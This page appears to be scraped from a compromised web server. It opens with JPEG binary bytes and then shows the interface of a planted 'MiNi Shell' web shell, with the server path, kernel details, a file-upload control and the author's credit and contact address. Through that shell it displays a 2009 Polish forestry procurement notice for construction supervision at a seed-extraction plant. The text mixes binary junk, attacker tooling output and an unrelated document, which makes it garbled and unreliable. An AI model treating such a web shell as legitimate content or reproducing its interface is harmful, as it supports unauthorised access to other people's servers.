JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090527/168102-N-2009.html

<p class="kh_header"><b>Kluczbork: Kompleksowy nadzór inwestorski przy realizacji zadania pn.: Rozbudowa Wyłuszczarni nasion w Lasowicach Małych.</b><br>
<b>Numer ogłoszenia: 168102 - 2009; data zamieszczenia: 27.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Kluczbork , ul. A. Mickiewicza 8, 46-200 Kluczbork, woj. opolskie, tel. 077 4182540, 4186565, 4180105, faks 077 4182323.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowy nadzór inwestorski przy realizacji zadania pn.: Rozbudowa Wyłuszczarni nasion w Lasowicach Małych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia: Pełnienie kompleksowego nadzoru inwestorskiego nad realizacją zamówienia pn.: Rozbudowa Wyłuszczarni Nasion w Lasowicach Małych, ul.Odrodzenia 63.
2.Lokalizacja usługi będącej przedmiotem zamówienia:
Wyłuszczarnia Nasion, ul. Odrodzenia 63 Lasowice Małe.
3.Zamówienie polega na sprawowaniu nadzoru nad realizacją powyższej inwestycji zgodnie z obowiązującymi przepisami Ustawy Prawo Budowlane(w zakresie określonym w art. 25 i art. 26 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity: Dz. U. z 2006 r. Nr 156, poz. 1118 z późn. zmian.)w następujących branżach:
3.1.budowlanej,
3.2.elektrycznej i teletechnicznej,
3.3.sanitarnej,
3.4.drogowej,
3.5.innej, która będzie wymagana aktualnie obowiązującymi przepisami prawa dla w/w inwestycji,
oraz w zakresie określonym w niniejszej specyfikacji istotnych warunków zamówienia (zwanej dalej SIWZ), a w szczególności: 
a)prowadzeniu kontroli nad działaniami kierownika budowy i ich  zgodności z przepisami ww. Ustawy Prawo budowlane,
b)prowadzeniu kontroli dziennika budowy i odpowiednich zapisów z czynności kontrolnych i inspektorskich oraz dokumentacji budowy,
c)kontroli jakości wykonanych prac budowlano - montażowych, zgodności robót z dokumentacją, przepisami techniczno - budowlanymi i sztuka budowlaną,
d)prowadzeniu kontroli stosowanych materiałów i urządzeń w zakresie dopuszczenia do obrotu i parametrów zgodnych z dokumentacją techniczną,
e)rozstrzygania wątpliwości natury technicznej powstałych w toku prowadzenia robót,
f)czuwanie nad przestrzeganiem przepisów BHP w czasie realizacji inwestycji,
g)bieżące informowanie Inwestora o postępie robót na budowie i ewentualnych trudnościach w jej realizacji,
h)organizowanie odbiorów częściowych i odbioru końcowego inwestycji ( z udziałem przedstawiciela Inwestora),
i)uzyskanie pozwolenia na użytkowanie budynku,
j)egzekwowanie od Wykonawcy robót wszystkich warunków realizacji umowy zawartej pomiędzy Inwestorem, a Wykonawcą, w tym usunięcie usterek stwierdzonych w trakcie realizacji i na dzień odbioru.
4.Do obowiązków nadzoru inwestorskiego w porozumieniu z Zamawiającym należeć będzie również: 
4.1.Przygotowania dokumentów niezbędnych do przekazania wykonawcy placu budowy i uczestnictwo w tym przekazaniu.
4.2.Bieżąca kontrola zgodności realizacji inwestycji z zawartymi umowami, kontrola jakości wykonywanych robót, wbudowanych elementów i materiałów, zgodności robót z warunkami pozwolenia na budowę, specyfikacjami technicznymi, przepisami techniczno-budowlanymi, normami i przepisami BHP, P-POŻ oraz ochrony środowiska naturalnego; 
4.3.Na etapie realizacji zgłaszanie projektantowi zastrzeżeń wykonawcy robót budowlanych lub Zamawiającemu do projektu budowlanego i dokonywanie z nim stosownych uzgodnień lub wyjaśnień;
4.4. Przyjmowanie faktur i dokumentów rozliczeniowych od wykonawcy, bieżąca kontrola i zatwierdzanie faktur i dokumentów rozliczeniowych ( w tym książki obmiaru)pod względem merytorycznym i rachunkowym i przekazywanie ich Zamawiającemu.
4.5. Informowanie Zamawiającego o postępie w realizacji inwestycji w okresach miesięcznych;
4.6.Przygotowanie całokształtu spraw do odbioru inwestycji przez Zamawiającego, w tym w szczególności dokonania odbioru końcowego inwestycji lub udziału w odbiorach częściowych poszczególnych elementów robót, w tym robót ulegających zakryciu i zanikających. Inspektor nadzoru potwierdzi zgłoszoną przez Wykonawcę gotowość do odbioru, dokona odbioru, przekaże zamawiającemu niezbędna dokumentację odbioru (protokoły wraz z załącznikami i dokumentami) oraz dokumentację podwykonawczą jak i dokona ostatecznego odbioru obiektu po upływie okresu gwarancji ustalonego w umowie z Wykonawcą. Inspektor nadzoru będzie także uczestniczył w przeglądach między gwarancyjnych i nadzorował usuwanie stwierdzonych protokolarnie wad i usterek;
4.7. Przygotowanie materiałów umożliwiających uzyskanie decyzji o pozwoleniu na użytkowanie obiektu celem ich złożenia do właściwego organu nadzoru budowlanego, w tym: złożenie oświadczenia na piśmie o prawidłowości wykonanych prac (zgodność z umową, projektem, warunkami technicznymi wykonania i odbioru robót oraz technologią); 
4.8.Po uzyskaniu pozwolenia na użytkowanie założenie i wypełnienie książek obiektów budowlanych ;
4.9.Sporządzenie rozliczenia finansowo-rzeczowego inwestycji;
4.10.Przygotowanie informacji do sporządzenia dowodów przekazania - przejęcia na majątek środków trwałych OT; 
4.11.Wykonanie czynności odnoszących się do realizacji uprawnień z tytułu rękojmi za wady wykonanych robót.
4.12. W ramach obowiązków wymienionych w ust. 3.1.2 Inspektor Nadzoru w każdej branży jest zobowiązany do wizytacji budowy w trakcie jej realizacji. Częstotliwość pobytów na budowie może być zmienna w zależności od potrzeb w poszczególnych okresach realizacji, a także w zależności od branży nadzoru, przy ostatecznym zachowaniu łącznej ilości pobytów.  
5.Zakres rzeczowy robót budowlanych będących przedmiotem nadzoru inwestorskiego określony jest w dokumentacji projektowej i specyfikacji technicznej wykonania i odbioru robót budowlanych opracowanych przez Zespół Usług Projektowych PRO-LAS s.c., al. Słowackiego 17 A, 31-159 Kraków, a ich realizacja odbywała się będzie na podstawie umowy, którą Zamawiający zawrze z wykonawcą robót budowlanych wyłonionym w wyniku odrębnie przeprowadzonego przetargu.
Zamawiający dopuszcza możliwość zapoznania się z w/w dokumentami, dostępnymi w siedzibie Zamawiającego. (pokój nr 2).
6. Zakres rzeczowy świadczonej usługi nadzoru inwestorskiego obejmuje także nadzór nad wszystkimi robotami zamiennymi i dodatkowymi, które mogą wyniknąć w trakcie realizacji inwestycji.
7. Dane ogólne dotyczące inwestycji:
7.1.Charakterystyka obiektu:   
 Wyłuszczarnia Nasion w Lasowicach Małych to kompleks budynków dwukondygnacyjnych połączonych korytarzem składającym się z następujących części:
- murowany budynek chłodni, w którym zlokalizowane są: chłodnie, biuro Wyłuszczarni, węzeł sanitarny, pokój socjalny ochrony, laboratorium, kotłownia, hala szaf łuszczarskich, hala separatorów, hala termoterapii dęba;
- drewniany magazyn szyszek, w którym zlokalizowana jest: hala przyjęcia szyszek, szyb windy towarowej, magazyn szyszek.
Budynek w większości procesów wykorzystuje energię elektryczną, dostarczaną poprzez przyłącz transformatorowy, zasilanie w wodę następuje z wodociągu wiejskiego. System centralnego ogrzewania oparty jest o kocioł CO. Plac manewrowy, wjazd z drogi powiatowej i wyjazd z podwórza Wyłuszczarni jest wyasfaltowany. Podwórze ogrodzone jest siatką na słupkach metalowych z cokołem betonowym.
7.2.Inwestycja będąca przedmiotem nadzoru inwestorskiego składa się z (wg założeń projektowych):
- wybudowanie nowego budynku przechowalni nasion z hala wjazdową wraz ze wszystkimi robotami ziemnymi( wraz z wyposażeniem w niezbędny sprzęt i urządzenia)
- modernizację istniejącego budynku Wyłuszczarni i Magazynu Szyszek wraz ze zmianą funkcji pomieszczeń ( wraz z wyposażeniem w  niezbędny sprzęt i  urządzenia)
- modernizacja układu zasilania elektrycznego z baterią kondensatorów niezbędnych do ograniczenia zużycia energii elektrycznej;
- przebudowa przyłącza i wewnętrznej sieci wodociągowej;
- wykonanie nowego ogrodzenia wraz z bramami wjazdowymi;
- przebudowa wjazdów na teren Wyłuszczarni Nasion;
- wykonanie ekologicznej oczyszczalni ścieków;
- wykonanie separatora na ścieki niebezpieczne;
- wykonanie wewnętrznej sieci komputerowej, telefonicznej;
- modernizacja układu centralnego ogrzewania;
- modernizacja sieci wod.-kan.;
- dostosowanie do nowych warunków placu manewrowego;
- modernizacja oświetlenia obiektu;
- modernizacja systemu zabezpieczenia przeciwpożarowego obiektu;
- architektura zielona;
- opracowanie systemu ochrony i monitoringu obiektu;
- wyposażenie w urządzenia i sprzęt niezbędny do prawidłowego funkcjonowania Wyłuszczarni( chłodnia, magazyny, stacja oceny nasion).
	Prace modernizacyjne planowane do wykonania na istniejącym budynku będą obejmowały w szczególności: zmianę przeznaczenia niektórych pomieszczeń; uzupełnienie i poprawienie (wymiana) izolacji termicznych w chłodniach; zwiększenie powierzchni magazynowych w chłodniach; przebudowa instalacji wod.-kan.-co. i ee.; wykonanie nowej instalacji przeciwpożarowej oraz wykonanie systemu monitoringu i ochrony; modernizacja windy towarowej - dostosowanie do wymogów Urzędu Dozoru Technicznego. 
7.3.Szacowana wartość inwestycji wg. kosztorysów inwestorskich 4.800,00 zł netto..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Przystępując do złożenia oferty Wykonawca zobowiązany jest do wniesienia wadium.
Wadium należy wnieść przed upływem terminu składania ofert, tj. do 05.06.2009 do godz. 10.30.
Zamawiający ustala wadium na kwotę:
2000,00 złotych (słownie:  dwa tysiące złotych 00/100
 Wadium musi obejmować okres związania ofertą, tj.30 dni. Pierwszym dniem terminu związania ofertą jest dzień składania ofert.
Wadium może być wniesione w jednej lub kilku następujących formach:
-pieniądzu;
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-gwarancjach bankowych,
-gwarancjach ubezpieczeniowych, 
-poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt.2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.42/07 poz.275).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 6.1. O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy:
6.1.1.Nie są wykluczeni z postępowania na podstawie zaistnienia przesłanek wykluczenia z postępowania, określonych w art. 24 Prawa zamówień publicznych;
6.1.1.1)posiadają uprawnienia do wykonywania określonej działalności   lub czynności w poszczególnych branżach związanych z nadzorowaniem prac budowlanych;
6.1.1.2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
Powyższy warunek zostanie spełniony przez Wykonawcę, jeżeli:
a)udokumentuje, iż w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenia zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał co najmniej dwie usługi nadzoru inwestorskiego nad realizacją roboty budowlanej w obiekcie użytkowym o wartości nie mniejszej niż 5.000.000,00 zł. netto, odpowiadającą swym zakresem przedmiotowi zamówienia.
 UWAGA:W przypadku składania oferty przez podmioty występujące wspólnie, warunek musi spełniać, co najmniej jeden podmiot.
b) dysponują lub będą dysponować osobami z wymaganymi uprawnieniami do nadzorowania robotami budowlanymi (wykonywania nadzoru inwestorskiego nad robotami budowlanymi będącym przedmiotem zamówienia) w branżach: budowlanej bez ograniczeń, elektrycznej bez ograniczeń, sanitarnej bez ograniczeń, drogowej bez ograniczeń i innych wymaganych aktualnie obowiązującymi przepisami prawa dla ww inwestycji - w rozumieniu ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tekst jednolity - Dz. U. z 2006 r. Nr 156 poz. 1118 z późn. zmian.) zwanej dalej Prawo budowlane , uzyskanych przed dniem wejścia w życie ustawy Prawo budowlane, wpisanymi na listę członków właściwej izby samorządu zawodowego inżynierów budownictwa (Art. 6 ustawy z dnia 15 grudnia 2000 roku o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów - Dz. U. z 2001 r. Nr 5, poz. 42 z późniejszymi zmianami):
Wykonawcy muszą wykazać się, iż dysponują lub będą dysponować co najmniej 1 osobą w każdej z wyżej wymienionych branż zdolną do wykonania zamówienia posiadającą odpowiednie uprawnienia budowlane pozwalające na pełnienie funkcji inspektora nadzoru przy realizacji przedmiotu inwestycji.
Każda z wyżej wymienionych osób musi posiadać co najmniej 5-cio letni staż w pełnieniu samodzielnych funkcji w budownictwie w zakresie kierowania robót budowlanych (wykonywanie nadzoru inwestorskiego) oraz wykazać się doświadczeniem polegającym na pełnieniu funkcji inspektora nadzoru inwestorskiego na co najmniej dwóch zrealizowanych (zakończonych) budowach.
6.1.2.3)znajdują się w sytuacji ekonomicznej i finansowej  zapewniającej wykonanie zamówienia;
   Powyższy warunek zostanie uznany za spełniony przez Wykonawcę, jeżeli:
a) udokumentuje on, jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż 500.000,00 zł.
6.1.3.Sposób oceny spełniania warunków:
1.Ocena spełniania warunków dokonana zostanie wg formuły spełnia-nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w pkt. 7 SIWZ, dołączonych do oferty. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać, iż Wykonawca spełnia wymienione warunki. Uzupełnienie wymaganych dokumentów będzie możliwe po upływie terminu składania ofert, w terminie wskazanym przez Zamawiającego.
2. Zamawiający wzywa wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów, o których mowa w art.25 ust.1 PZP, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez Zamawiającego oświadczenia i dokumenty, o których mowa w art.25 ust.1 PZP, zawierające błędy ,lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez  wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)formularz ofertowy ( na lub wg załączonego druku zał. Nr 1 do SIWZ);
2)uzupełniony i parafowany projekt umowy na wykonanie zadania ( zał.  Nr.3 do SIWZ);
3)oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 pkt 1-3 Prawa zamówień publicznych - wzór oświadczenia stanowi integralną  część wzoru formularza ofertowego; 
4)oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie zaistnienia przesłanek wykluczenia z postępowania, określonych w art. 24 Prawa zamówień publicznych - wzór oświadczenia stanowi załącznik nr 2 do SIWZ ;
5)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
7)aktualne zaświadczenie naczelnika właściwego Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert ;
8)aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub zaświadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności , wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
9) pełnomocnictwo do podpisania oferty i załączników, o ile prawo do    reprezentowania Wykonawcy nie wynika z innych dokumentów złożonych wraz z ofertą. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) do oferty należy dołączyć pełnomocnictwo podpisane przez uprawnionych przedstawicieli pozostałych Wykonawców, upoważniające jednego z Wykonawców do reprezentowania pozostałych -;
10)wykazu osób i podmiotów, które będą uczestniczyć w wykonywaniu przedmiotu zamówienia( na lub wg. Załącznika nr 4 do SIWZ)- do wykazu należy dołączyć uwierzytelnione kserokopie dokumentów potwierdzających, że osoby, które będą uczestniczyć w wykonywaniu przedmiotu zamówienia, posiadają wymagane uprawnienia do nadzorowania budowy oraz przynależą do właściwej izby samorządu zawodowego bądź izby inżynierów budownictwa i tym samym posiadają wymagane ubezpieczenie od odpowiedzialności cywilnej - DOKUMENTY DOŁĄCZA WYKONAWCA;
11)Wykaz usług wykonywanych przez wykonawcę w okresie ostatnich trzech lat przed wszczęciem postępowania, a jeżeli okres wykonywania działalności jest krótszy - w tym okresie (wg wzoru - załącznik nr 5):wykonawca wykaże się należytym wykonaniem co najmniej dwóch usług pełnienia funkcji inspektora nadzoru w branżach: budowlanej, drogowej, sanitarnej, elektrycznej oraz teletechnicznej na jednej budowie o wartości tej usługi nie mniejszej niż 5.000.000,00 zł oraz załączą dokumenty potwierdzające, że te usługi zostały wykonane należycie;
12)uwierzytelniona kserokopia polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 500.000,00zł ;
13)oświadczenie o zamiarze powierzenia części zamówienia podwykonawcom(na lub wg. Załącznika nr 6 do SIWZ)- w przypadku, gdy oferent zamierza powierzyć część zadania podwykonawcom - wymagane jest z złożenie oświadczenia precyzującego, która część zamówienia będzie wykonywana przez podwykonawcę;
14)oświadczenie podwykonawcy o przyjęciu części zadania do realizacji ( na lub wg. Wzoru Załącznika nr 7 do SIWZ);
15) Dowód wniesienia wadium,
16)Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (np. konsorcjum, spółka cywilna): 
 W przypadku, gdy Wykonawcy ubiegają się wspólnie o udzielenie zamówienia, ich oferta musi spełniać następujące wymagania:
1)Wykonawcy muszą dołączyć do oferty pełnomocnictwo, podpisane przez upoważnionych przedstawicieli wszystkich pozostałych Wykonawców,
2)wszelka korespondencja oraz rozliczenia dokonywane będą z Wykonawcą wskazanym i upoważnionym w pełnomocnictwie przez pozostałych Wykonawców,
3)oferta musi być podpisana w taki sposób, aby skutecznie zobowiązywała wszystkich Wykonawców występujących wspólnie,
4)każdy z Wykonawców odrębnie ma obowiązek oświadczyć, że nie podlega wykluczeniu z postępowania na podstawie zaistnienia przesłanek wykluczenia z postępowania, określonych w art. 24 Prawa zamówień publicznych - wzór oświadczenia jest załącznikiem nr 3 do SIWZ,
5)wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na Wykonawcę, w miejscu np. nazwa i adres Wykonawcy należy wpisać dane dotyczące Wykonawców ubiegających się wspólnie o udzielenie zamówienia, a nie dane pełnomocnika..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.katowice.lasy.gov.pl/web/kluczbork/przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Nadleśnictwa Kluczbork
ul.Mickiewicza 8
46-200 Kluczbork
Pokój nr. 2.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2009 godzina 10:30, miejsce: Siedziba Nadleśnictwa Kluczbork
ul.Mickiewicza 8
46-200 Kluczbork
Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com